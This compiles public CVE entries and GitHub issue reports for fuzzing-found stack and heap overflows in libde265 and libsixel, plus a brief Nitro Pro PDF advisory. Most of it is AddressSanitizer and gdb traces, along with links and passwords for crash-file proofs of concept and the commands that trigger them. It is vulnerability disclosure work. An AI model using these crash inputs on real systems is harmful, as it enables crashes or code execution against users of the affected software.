libde265 v1.0.4 contains a stack buffer overflow in the put_qpel_fallback function, which can be exploited via a crafted a file.

**stack-buffer-overflow in put\_qpel\_fallback when decoding file**

I found some problems during fuzzing

**Test Version**

dev version, git clone https://github.com/strukturag/libde265

**Test Environment**

root@ubuntu:~# lsb\_release -a  
No LSB modules are available.  
Distributor ID: Ubuntu  
Description: Ubuntu 16.04.6 LTS  
Release: 16.04  
Codename: xenial

root@ubuntu:\# uname -a  
Linux ubuntu 4.15.0-45-generic #4816.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86\_64 x86\_64 x86\_64 GNU/Linux

**Test Configure**

./configure  
configure: ---------------------------------------  
configure: Building dec265 example: yes  
configure: Building sherlock265 example: no  
configure: Building encoder: yes  
configure: ---------------------------------------

**Test Program**

dec265 [infile]

**Asan Output**

    root@ubuntu:~# ./dec265 libde265-put_qpel_fallback-stack_overflow.crash
    WARNING: pps header invalid
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: pps header invalid
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: pps header invalid
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    =================================================================
    ==91107==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffebaa90b7f at pc 0x00000043836d bp 0x7ffebaa8e510 sp 0x7ffebaa8e500
    READ of size 2 at 0x7ffebaa90b7f thread T0
        #0 0x43836c in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:520
        #1 0x433c33 in put_qpel_1_3_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) /root/src/libde265/libde265/fallback-motion.cc:646
        #2 0x52c405 in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const ../libde265/acceleration.h:338
        #3 0x52d7d6 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:156
        #4 0x51f6f2 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:376
        #5 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107
        #6 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137
        #7 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492
        #8 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647
        #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861
        #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736
        #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049
        #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843
        #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945
        #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730
        #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688
        #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #20 0x7fd98d83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #21 0x402b28 in _start (/root/dec265+0x402b28)
    
    Address 0x7ffebaa90b7f is located in stack of thread T0 at offset 9151 in frame
        #0 0x52cf34 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:49
    
      This frame has 2 object(s):
        [32, 9120) 'mcbuffer'
        [9152, 14832) 'padbuf' <== Memory access at offset 9151 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:520 void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int)
    Shadow bytes around the buggy address:
      0x10005754a110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10005754a160: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2[f2]
      0x10005754a170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10005754a1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==91107==ABORTING
    

**POC file**

libde265-put\_qpel\_fallback-stack\_overflow.zip  
libde265-put\_qpel\_fallback-stack\_overflow2.zip  
password: leon.zhao.7

**CREDIT**

Zhao Liang, Huawei Weiran Labs

CVE-2020-21601: stack-buffer-overflow in put_qpel_fallback when decoding file · Issue #241 · strukturag/libde265

libde265 v1.0.4 contains a heap buffer overflow in the de265_image::available_zscan function, which can be exploited via a crafted a file.

**heap overflow in de265\_image::available\_zscan when decoding file**

I found some problems during fuzzing

**Test Version**

dev version, git clone https://github.com/strukturag/libde265

**Test Environment**

root@ubuntu:~# lsb\_release -a  
No LSB modules are available.  
Distributor ID: Ubuntu  
Description: Ubuntu 16.04.6 LTS  
Release: 16.04  
Codename: xenial

root@ubuntu:\# uname -a  
Linux ubuntu 4.15.0-45-generic #4816.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86\_64 x86\_64 x86\_64 GNU/Linux

**Test Configure**

./configure  
configure: ---------------------------------------  
configure: Building dec265 example: yes  
configure: Building sherlock265 example: no  
configure: Building encoder: yes  
configure: ---------------------------------------

**Test Program**

dec265 [infile]

**Asan Output**

    root@ubuntu:~# ./dec265 libde265-de265_image__available_zscan-heap_overflow.crash
    WARNING: pps header invalid
    WARNING: non-existing PPS referenced
    WARNING: pps header invalid
    WARNING: non-existing PPS referenced
    =================================================================
    ==50404==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a0000178bc at pc 0x000000443563 bp 0x7fff14a846d0 sp 0x7fff14a846c0
    READ of size 4 at 0x62a0000178bc thread T0
        #0 0x443562 in de265_image::available_zscan(int, int, int, int) const /root/src/libde265/libde265/image.cc:760
        #1 0x443acf in de265_image::available_pred_blk(int, int, int, int, int, int, int, int, int, int) const /root/src/libde265/libde265/image.cc:796
        #2 0x521fd7 in derive_spatial_merging_candidates(MotionVectorAccess const&, de265_image const*, int, int, int, int, int, unsigned char, int, int, int, PBMotion*, int) /root/src/libde265/libde265/motion.cc:808
        #3 0x525e21 in get_merge_candidate_list_without_step_9(base_context*, slice_segment_header const*, MotionVectorAccess const&, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:1467
        #4 0x526732 in derive_luma_motion_merge_mode(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:1570
        #5 0x52afb3 in motion_vectors_and_ref_indices(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, PBMotion*) /root/src/libde265/libde265/motion.cc:2029
        #6 0x52b8ae in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2103
        #7 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310
        #8 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647
        #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861
        #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736
        #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049
        #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843
        #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945
        #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730
        #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688
        #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #20 0x7f4581a5882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #21 0x402b28 in _start (/root/dec265+0x402b28)
    
    0x62a0000178bc is located 1468 bytes to the right of 20736-byte region [0x62a000012200,0x62a000017300)
    allocated by thread T0 here:
        #0 0x7f4582959532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532)
        #1 0x42447e in __gnu_cxx::new_allocator<int>::allocate(unsigned long, void const*) /usr/include/c++/5/ext/new_allocator.h:104
        #2 0x422d9c in std::allocator_traits<std::allocator<int> >::allocate(std::allocator<int>&, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:491
        #3 0x420d4f in std::_Vector_base<int, std::allocator<int> >::_M_allocate(unsigned long) /usr/include/c++/5/bits/stl_vector.h:170
        #4 0x455ef8 in std::vector<int, std::allocator<int> >::_M_default_append(unsigned long) /usr/include/c++/5/bits/vector.tcc:557
        #5 0x455c0c in std::vector<int, std::allocator<int> >::resize(unsigned long) /usr/include/c++/5/bits/stl_vector.h:676
        #6 0x451598 in pic_parameter_set::set_derived_values(seq_parameter_set const*) /root/src/libde265/libde265/pps.cc:589
        #7 0x450649 in pic_parameter_set::read(bitreader*, decoder_context*) /root/src/libde265/libde265/pps.cc:528
        #8 0x40a562 in decoder_context::read_pps_NAL(bitreader&) /root/src/libde265/libde265/decctx.cc:574
        #9 0x40dc78 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1244
        #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #13 0x7f4581a5882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/image.cc:760 de265_image::available_zscan(int, int, int, int) const
    Shadow bytes around the buggy address:
      0x0c547fffaec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c547fffaf10: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
      0x0c547fffaf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c547fffaf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==50404==ABORTING
    

**POC file**

libde265-de265\_image\_\_available\_zscan-heap\_overflow.zip  
password: leon.zhao.7

**CREDIT**

Zhao Liang, Huawei Weiran Labs

CVE-2020-21599: heap overflow in de265_image::available_zscan when decoding file · Issue #235 · strukturag/libde265

libde265 v1.0.4 contains a heap buffer overflow fault in the put_epel_16_fallback function, which can be exploited via a crafted a file.

CVE-2020-21606: heap-buffer-overflow in put_epel_16_fallback when decoding file · Issue #232 · strukturag/libde265

libde265 v1.0.4 contains a heap buffer overflow fault in the _mm_loadl_epi64 function, which can be exploited via a crafted a file.

**heap-buffer-overflow in decode file**

I found some problems during fuzzing

**Test Version**

dev version, git clone https://github.com/strukturag/libde265

**Test Environment**

root@ubuntu:~# lsb\_release -a  
No LSB modules are available.  
Distributor ID: Ubuntu  
Description: Ubuntu 16.04.6 LTS  
Release: 16.04  
Codename: xenial

**Test Configure**

./configure  
configure: ---------------------------------------  
configure: Building dec265 example: yes  
configure: Building sherlock265 example: no  
configure: Building encoder: yes  
configure: ---------------------------------------

**Test Program**

dec265 [infile]

**Asan Output**

    root@ubuntu:~# /opt/asan/bin/dec265 libde265-mm_loadl_epi64-heap_overflow.crash
    WARNING: maximum number of reference pictures exceeded
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: faulty reference picture list
    WARNING: coded parameter out of range
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: faulty reference picture list
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: maximum number of reference pictures exceeded
    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: faulty reference picture list
    WARNING: faulty reference picture list
    =================================================================
    ==129719==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62b000068560 at pc 0x0000004d0359 bp 0x7ffe48aefc20 sp 0x7ffe48aefc10
    READ of size 8 at 0x62b000068560 thread T0
        #0 0x4d0358 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704
        #1 0x4d0358 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*) /root/src/libde265/libde265/x86/sse-motion.cc:987
        #2 0x52bf76 in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:296
        #3 0x52dc7a in void mc_chroma<unsigned short>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned short const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:205
        #4 0x51f88a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:382
        #5 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107
        #6 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310
        #7 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647
        #8 0x47b611 in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4636
        #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861
        #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736
        #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049
        #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843
        #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945
        #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730
        #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688
        #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #20 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #21 0x402b28 in _start (/opt/asan/bin/dec265+0x402b28)
    
    0x62b000068560 is located 80 bytes to the right of 25360-byte region [0x62b000062200,0x62b000068510)
    allocated by thread T0 here:
        #0 0x7f56ce38e076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076)
        #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54
        #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132
        #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384
        #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262
        #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418
        #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648
        #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066
        #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639
        #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230
        #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318
        #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346
        #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764
        #13 0x7f56cd48d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/5/include/emmintrin.h:704 _mm_loadl_epi64(long long __vector(2) const*)
    Shadow bytes around the buggy address:
      0x0c5680005050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5680005060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5680005070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5680005080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5680005090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c56800050a0: 00 00 fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
      0x0c56800050b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c56800050c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c56800050d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c56800050e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c56800050f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==129719==ABORTING
    

**POC file**

libde265-mm\_loadl\_epi64-heap\_overflow.zip  
password: leon.zhao.7

**CREDIT**

Zhao Liang, Huawei Weiran Labs

CVE-2020-21604: heap-buffer-overflow in decode file · Issue #231 · strukturag/libde265

An exploitable return of stack variable address vulnerability exists in the JavaScript implementation of Nitro Pro PDF. A specially crafted document can cause a stack variable to go out of scope, resulting in the application dereferencing a stale pointer. This can lead to code execution under the context of the application. An attacker can convince a user to open a document to trigger the vulnerability.

CVE-2021-21798: TALOS-2021-1267 || Cisco Talos Intelligence Group

Libsixel prior to v1.8.3 contains a stack buffer overflow in the function gif_process_raster at fromgif.c.

Our fuzzer detected several crashes when converting gif file against 2df6437 (compiled with Address Sanitizer). The command to trigger that is img2sixel $POC -o /tmp/test.six where $POC can be:  
https://github.com/ntu-sec/pocs/blob/master/libsixel-2df6437/crashes/so\_fromgif.c%3A310\_1.gif  
https://github.com/ntu-sec/pocs/blob/master/libsixel-2df6437/crashes/so\_fromgif.c%3A310\_2.gif

gdb output is like:

    GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
    Copyright (C) 2018 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from /home/hongxu/FOT/libsixel/install/bin/img2sixel...done.
    Starting program: /home/hongxu/FOT/libsixel/install/bin/img2sixel hbo_fromgif.c:310_1.gif -o /tmp/test.six
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    =================================================================
    ==17533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffa7d8 at pc 0x7ffff7b5f160 bp 0x7fffffff5950 sp 0x7fffffff5948
    WRITE of size 2 at 0x7fffffffa7d8 thread T0
        #0 0x7ffff7b5f15f in gif_process_raster /home/hongxu/FOT/libsixel/src/fromgif.c:310:31
        #1 0x7ffff7b5c303 in gif_load_next /home/hongxu/FOT/libsixel/src/fromgif.c:462:22
        #2 0x7ffff7b5a25e in load_gif /home/hongxu/FOT/libsixel/src/fromgif.c:599:22
        #3 0x7ffff7b11198 in load_with_builtin /home/hongxu/FOT/libsixel/src/loader.c:858:18
        #4 0x7ffff7b10116 in sixel_helper_load_image_file /home/hongxu/FOT/libsixel/src/loader.c:1352:18
        #5 0x7ffff7b69d98 in sixel_encoder_encode /home/hongxu/FOT/libsixel/src/encoder.c:1737:14
        #6 0x515787 in main /home/hongxu/FOT/libsixel/converters/img2sixel.c:457:22
        #7 0x7ffff61a6b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
        #8 0x41a239 in _start (/home/hongxu/FOT/libsixel/install/bin/img2sixel+0x41a239)
    
    Address 0x7fffffffa7d8 is located in stack of thread T0 at offset 18296 in frame
        #0 0x7ffff7b5999f in load_gif /home/hongxu/FOT/libsixel/src/fromgif.c:555
    
      This frame has 4 object(s):
        [32, 208) 's' (line 556)
        [272, 18296) 'g' (line 557) <== Memory access at offset 18296 overflows this variable
        [18560, 18568) 'frame' (line 559)
        [18592, 18600) 'fnp' (line 560)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hongxu/FOT/libsixel/src/fromgif.c:310:31 in gif_process_raster
    Shadow bytes around the buggy address:
      0x10007fff74a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff74e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff74f0: 00 00 00 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2
      0x10007fff7500: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff7510: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2
      0x10007fff7520: 00 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==17533==ABORTING
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
    51	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
    #1  0x00007ffff61c5801 in __GI_abort () at abort.c:79
    #2  0x000000000050376b in __sanitizer::Abort() ()
    #3  0x0000000000500a98 in __sanitizer::Die() ()
    #4  0x00000000004e2d1d in __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) ()
    #5  0x00000000004e374b in __asan_report_store2 ()
    #6  0x00007ffff7b5f160 in gif_process_raster (s=0x7fffffff6080, g=0x7fffffff6170) at fromgif.c:310
    #7  0x00007ffff7b5c304 in gif_load_next (s=0x7fffffff6080, g=0x7fffffff6170, bgcolor=0x0) at fromgif.c:462
    #8  0x00007ffff7b5a25f in load_gif (buffer=0x62d000000400 "GIF89a\f", size=0xca, bgcolor=0x0, reqcolors=0x100, fuse_palette=0x1, fstatic=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, context=0x610000000040, allocator=0x604000000190) at fromgif.c:599
    #9  0x00007ffff7b11199 in load_with_builtin (pchunk=0x603000000e20, fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, context=0x610000000040) at loader.c:858
    #10 0x00007ffff7b10117 in sixel_helper_load_image_file (filename=0x7fffffffc9ed "hbo_fromgif.c:310_1.gif", fstatic=0x0, fuse_palette=0x1, reqcolors=0x100, bgcolor=0x0, loop_control=0x0, fn_load=0x7ffff7b6a090 <load_image_callback>, finsecure=0x0, cancel_flag=0x13b61c0 <signaled>, context=0x610000000040, allocator=0x604000000190) at loader.c:1352
    #11 0x00007ffff7b69d99 in sixel_encoder_encode (encoder=0x610000000040, filename=0x7fffffffc9ed "hbo_fromgif.c:310_1.gif") at encoder.c:1737
    #12 0x0000000000515788 in main (argc=0x4, argv=0x7fffffffc488) at img2sixel.c:457

CVE-2020-21050: AddressSanitizer: stack-buffer-overflow at fromgif.c:310 · Issue #75 · saitoha/libsixel

